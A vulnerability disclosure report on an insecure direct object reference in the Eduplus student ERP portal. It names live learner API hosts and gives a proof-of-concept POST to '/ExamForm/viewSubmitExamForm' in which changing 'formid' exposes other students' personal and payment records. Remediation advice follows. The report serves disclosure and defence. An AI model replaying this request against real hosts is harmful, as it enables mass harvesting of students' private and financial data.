## https://sploitus.com/exploit?id=F66D24A3-EA54-50B6-9F6F-DD3564FAA827
# Vulnerability Research Report: All Eduplus ERP Insecure Direct Object Reference (IDOR)
Researcher: Vinay Sharma
## 1. Executive Summary
This report details a high-severity security vulnerability identified in the Eduplus Student ERP platform, specifically within the student learner portal (`learnerapi.pceterp.in`). The application suffers from a **Universal Insecure Direct Object Reference (IDOR)** on the exam form submission endpoint, allowing any authenticated user (student) to retrieve the sensitive personal and financial data of any other student by manipulating form identifiers.
vulnerabilities allows for large-scale data harvesting of student records, including Personally Identifiable Information (PII) and detailed financial transaction audit trails.
---
## 2. Vulnerability Details
- **Target Host:** `learnerapi.pceterp.in`, `learner.zealerp.in`, `learner.despu.edu.in` etc
- **Affected Endpoint:** `POST /ExamForm/viewSubmitExamForm`
- **Vulnerability Types:**
- Insecure Direct Object Reference (IDOR) [CWE-639]
- Weak Cryptography (AES-ECB with Hardcoded Key) [CWE-327, CWE-798]
- Sensitive Data Exposure [CWE-312]
- **Severity:** High (Estimated CVSS v3.1: 7.5 - `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`)
---
## 3. Technical Analysis
### 3.1 Insecure Direct Object Reference (IDOR)
The vulnerability resides in the `viewSubmitExamForm` endpoint. The server relies on two client-supplied parameters to identify the record to be retrieved:
1. **Request Body:** `{"formid": "XXXXX"}`
2. **HTTP Header:** `Router-Path: /view-pcu-exam-form/XXXXX`
While the user must be authenticated, the server fails to verify if the authenticated student is authorized to view the data associated with the requested `formid`. By iterating through numerical IDs, an attacker can access the records of other students.
---
## 4. Proof of Concept (PoC)
### 4.1 IDOR Exploitation
A standard POST request to the vulnerable endpoint with a modified `formid` yields sensitive student data.
**Request:**
```http
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (Authenticated Headers) ...
{"formid":"28984"}
```
**Response (Summary of Leaked Data):**
```json
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "student_example@email.com",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}
```
---
## 5. Impact Assessment
The successful exploitation of this vulnerability allows for:
- **Mass Exposure of PII:** Access to names, email addresses, student IDs, and login IP addresses of the entire student body.
- **Financial Data Breach:** Exposure of transaction history, bank IDs, and payment gateway references. This information is highly sensitive and could be used for financial social engineering or fraud.
- **Academic Privacy Violation:** Unauthorized access to exam forms, mentor assignments, and submission statuses.
---
## 6. Remediation Recommendations
### 6.1 Authorization Fix (Priority: High)
- Implement **Server-Side Authorization Checks:** The backend must verify that the `formid` requested belongs to the `learnerid` associated with the active session. Never trust the `formid` or `Router-Path` parameters without validation against the authenticated session token.
### 6.3 General Hardening
- **Minimize Data Output:** Ensure the API only returns the fields necessary for the specific UI view. Internal transaction IDs and IP addresses should be redacted unless absolutely required for the user's workflow.
- **Session Security:** Review the use of custom encrypted headers for session management and consider using standard, hardened JWTs or secure HTTP-only cookies.